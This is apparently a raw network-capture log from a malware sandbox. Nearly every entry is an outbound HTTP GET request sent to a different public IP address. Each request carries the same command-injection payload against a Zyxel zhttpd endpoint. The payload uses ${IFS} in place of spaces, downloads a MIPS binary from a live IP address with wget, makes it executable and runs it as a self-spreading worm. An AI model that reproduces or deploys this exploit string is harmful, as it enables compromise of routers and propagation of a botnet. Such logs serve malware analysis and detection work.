                                                Jan 29, 2024 07:07:59.565323114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7146192.168.2.2358926212.19.60.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565356970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7147192.168.2.2348608145.216.57.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565395117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7148192.168.2.2351870172.219.247.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565438032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7149192.168.2.2348666106.164.153.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565495014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7150192.168.2.2358182157.130.122.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565532923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7151192.168.2.2341904168.225.90.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565591097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7152192.168.2.235746449.159.253.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565632105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7153192.168.2.2339550194.172.141.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565673113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7154192.168.2.2352918115.46.238.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565705061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7155192.168.2.2341252202.99.137.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565721035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7156192.168.2.235895444.151.175.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565768957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7157192.168.2.234766075.249.89.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565802097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7158192.168.2.2358888157.27.145.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565819979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7159192.168.2.233520699.241.38.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565865993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7160192.168.2.2340496169.80.146.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565924883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7161192.168.2.2339848153.10.33.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.565958977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7162192.168.2.234381269.114.97.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566004992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7163192.168.2.2341064155.74.223.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566039085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7164192.168.2.235320839.241.181.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566075087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7165192.168.2.2336918223.187.138.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566107035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7166192.168.2.2358368202.35.199.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566154003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7167192.168.2.2339514184.66.142.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566178083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7168192.168.2.234141020.138.57.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566232920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7169192.168.2.2349790133.64.21.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566279888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7170192.168.2.2335230117.195.173.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566318035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7171192.168.2.2342378199.38.224.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566334963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7172192.168.2.2346740155.125.203.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566366911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7173192.168.2.235536080.127.51.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566421986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7174192.168.2.234648423.98.150.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566482067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7175192.168.2.234235090.107.185.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566531897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7176192.168.2.2359172174.104.146.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566555023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7177192.168.2.2359786128.38.111.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566587925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7178192.168.2.235550081.250.65.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566633940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7179192.168.2.2358890203.132.53.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566664934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7180192.168.2.235404034.50.13.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566687107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7181192.168.2.2345618122.122.201.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566719055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7182192.168.2.2336568218.91.184.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566755056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7183192.168.2.2346726145.148.99.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566812038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7184192.168.2.234707885.222.38.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566832066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7185192.168.2.2338730142.194.176.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566905022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7186192.168.2.235504813.118.244.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.566961050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7187192.168.2.2343492201.230.120.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567006111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7188192.168.2.23514549.106.226.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567054033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7189192.168.2.235553263.234.255.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567084074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7190192.168.2.2350948180.57.167.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567116976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7191192.168.2.2341622154.208.138.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567188978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192192.168.2.234936853.121.56.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567213058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7193192.168.2.2349892125.206.205.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567245007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7194192.168.2.235414076.209.44.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567256927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7195192.168.2.2334344162.174.8.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567290068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7196192.168.2.2349254171.199.249.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567328930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7197192.168.2.2360220121.56.64.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567385912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7198192.168.2.2343498180.187.210.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567414045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7199192.168.2.234502246.59.191.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567456961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7200192.168.2.23583081.148.74.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567503929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7201192.168.2.234630019.231.14.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567538977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7202192.168.2.2354778183.109.60.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567559004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7203192.168.2.2346586143.66.191.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567589998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7204192.168.2.2351094146.160.201.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567646027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7205192.168.2.2348820117.169.43.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567679882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7206192.168.2.2346170132.204.70.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567720890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7207192.168.2.2357750208.175.209.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567774057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7208192.168.2.2356374204.136.203.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.567806005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7209192.168.2.235035879.34.167.129443
                                                TimestampBytes transferredDirectionData
